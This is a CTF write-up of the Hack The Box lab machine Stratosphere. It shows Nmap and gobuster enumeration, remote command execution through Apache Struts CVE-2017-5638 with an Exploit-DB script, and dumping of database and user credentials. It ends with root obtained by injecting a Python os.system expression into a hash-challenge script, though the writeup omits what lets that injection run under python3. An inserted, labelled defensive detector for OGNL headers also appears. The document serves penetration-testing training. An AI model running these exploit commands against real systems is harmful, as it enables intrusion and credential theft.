HTB-Stratosphere Writeup

Heru Setiawan
Sep 3, 2018

Hello guys, the following is my writeup for Stratosphere. This machine is very interesting and I found many unexpected things in it.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

Let's just look at how to exploit this machine.

Nmap Scan

Let's see what Nmap gets.

root@kali:~# nmap -sV -sC 10.10.10.64 --open --reason
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2018-09-03 16:01 WIB
Nmap scan report for 10.10.10.64
Host is up, received echo-reply ttl 63 (0.32s latency).
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
|_ 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
80/tcp open http syn-ack ttl 63
|_http-title: Stratosphere
8080/tcp open http-proxy syn-ack ttl 63
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Stratosphere

As we can see, ports 22, 80 and 8080 are open. Ports 80 and 8080 have the same look and there is nothing interesting there, so let's continue by enumerating directories more deeply!

root@kali:~# gobuster -u http://10.10.10.64:8080 -w /root/wordlists/directory-list-2.3-medium.txt
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.64:8080/
[+] Threads : 10
[+] Wordlist : /root/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 307,200,204,301,302
=====================================================
/manager (Status: 302)
/Monitoring (Status: 302)

And we get 2 directories, but /Monitoring is more interesting to me. When I go into it, the web page is immediately redirected to this page:

http://10.10.10.64/Monitoring/example/Welcome.action
Figure 1. /Monitoring

Can Nmap confirm that this is vulnerable? Let's see…

root@kali:~# nmap -Pn -p8080 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/ 10.10.10.64
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2018-09-04 02:14 WIB
Nmap scan report for 10.10.10.64
Host is up (0.40s latency).
PORT STATE SERVICE
8080/tcp open http-proxy
| http-vuln-cve2017-5638:
| VULNERABLE:
| Apache Struts Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2017-5638
| Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution
| vulnerability via the Content-Type header.
|
| Disclosure date: 2017-03-07
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
| https://cwiki.apache.org/confluence/display/WW/S2-045
|_ http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
Nmap done: 1 IP address (1 host up) scanned in 1.71 seconds

Yeaaa, it's vulnerable!
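As an added defender-side example (not part of the original writeup), here is a small detector for the pattern the Nmap script reports above, where the OGNL expression is carried in the Content-Type request header. The sample requests are constructed; in practice the header sets would come from a proxy or access log.

```python
import re
from typing import Dict, List

# Substrings that never belong in a legitimate Content-Type value; any one of
# them is a strong signal of an OGNL expression riding in the header (S2-045).
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "#context",
                "ognl.OgnlContext", "@java.lang.Runtime")

# Shape of a well-formed Content-Type: type/subtype plus optional ;key=value parameters.
_TOKEN = r"[A-Za-z0-9!#$&^_.+-]+"
CONTENT_TYPE_RE = re.compile(rf'^{_TOKEN}/{_TOKEN}(\s*;\s*{_TOKEN}=("[^"]*"|{_TOKEN}))*\s*$')


def content_type_findings(value: str) -> List[str]:
    """Reasons a Content-Type value looks like S2-045 abuse; an empty list means benign."""
    findings = [m for m in OGNL_MARKERS if m in value]
    if not CONTENT_TYPE_RE.match(value):
        findings.append("malformed")
    return findings


def scan_requests(requests: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map request index -> findings for every request whose Content-Type is suspect."""
    hits: Dict[int, List[str]] = {}
    for i, headers in enumerate(requests):
        # Header names are case-insensitive, so match on the lowercased name.
        ct = next((v for k, v in headers.items() if k.lower() == "content-type"), None)
        if ct is None:
            continue
        findings = content_type_findings(ct)
        if findings:
            hits[i] = findings
    return hits


# Constructed sample traffic, not captured from the box.
SAMPLE_REQUESTS = [
    {"Host": "10.10.10.64:8080", "Content-Type": "application/x-www-form-urlencoded"},
    {"Host": "10.10.10.64:8080", "Content-Type": 'multipart/form-data; boundary="----abc123"'},
    # Marker-only stand-in for an OGNL payload; deliberately not a working expression.
    {"Host": "10.10.10.64:8080", "content-type": "%{(#_memberAccess).(#context)}"},
    {"Host": "10.10.10.64:8080", "Content-Type": "text/plain; charset"},  # broken parameter
]

if __name__ == "__main__":
    for idx, reasons in scan_requests(SAMPLE_REQUESTS).items():
        print(f"request {idx}: {', '.join(reasons)}")
```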

Exploit Apache Struts

As we know, .action is the Apache Struts extension, and there are many ways to exploit vulnerabilities in this application. I found this exploit on Exploit-DB.

Now we can test with the command 'id' to make sure this exploit works.

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring id
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: id
uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

Yes, it works! We can continue to enumerate more deeply and look for information that we can use to exploit this machine further.

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ ls
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: ls
conf
db_connect
lib
logs
policy
webapps
work

The db_connect file looks very interesting, let's see what it contains.

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ "cat db_connect"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: cat db_connect
[ssn]
user=ssn_admin
pass=AWs64@on*&
[users]
user=admin
pass=admin

After spending some time, we move on by connecting to MySQL with these credentials to see the information in the database.

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ 'mysql -u admin -padmin -e "show databases"'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: mysql -u admin -padmin -e "show databases"
Database
information_schema
users

What's inside users?

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ 'mysql -u admin -padmin -e "use users;show tables"'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: mysql -u admin -padmin -e "use users;show tables"
Tables_in_users
accounts

And we got the user Richard!

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ 'mysql -u admin -padmin -e "use users;select * from accounts"'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: mysql -u admin -padmin -e "use users;select * from accounts"
fullName password username
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard

Privilege Escalation And Get Root.txt

After getting Richard's credentials, let's log in over SSH as user richard.

root@kali:~# ssh richard@10.10.10.64
richard@10.10.10.64’s password:
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 3 06:08:53 2018 from 10.10.14.46
richard@stratosphere:~$ ls
Desktop hashlib.py __pycache__ test.py user.txt

And we got user.txt. Now let's see what is inside test.py.

richard@stratosphere:~$ cat test.py
#!/usr/bin/python3
import hashlib
def question():
    q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
    md5 = hashlib.md5()
    md5.update(q1.encode())
    if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
        print("Sorry, that's not right")
        return
    print("You got it!")
    q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
    sha1 = hashlib.sha1()
    sha1.update(q2.encode())
    if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
        print("Nope, that one didn't work...")
        return
    print("WOW, you're really good at this!")
    q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
    md4 = hashlib.new('md4')
    md4.update(q3.encode())
    if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
        print("Yeah, I don't think that's right.")
        return
    print("OK, OK! I get it. You know how to crack hashes...")
    q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
    blake = hashlib.new('BLAKE2b512')
    blake.update(q4.encode())
    if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
        print("You were so close! urg... sorry rules are rules.")
        return
    import os
    os.system('/root/success.py')
    return
question()

It looks like a hash-cracking challenge, but after spending some real time on it we found we just need to inject the following expression as the answer:

__import__('os').system('cat /root/root.txt')

And we got root!

Figure 2. Getting root.txt

Byeee!

Written by Heru Setiawan, IT Security Engineer | Indonesia
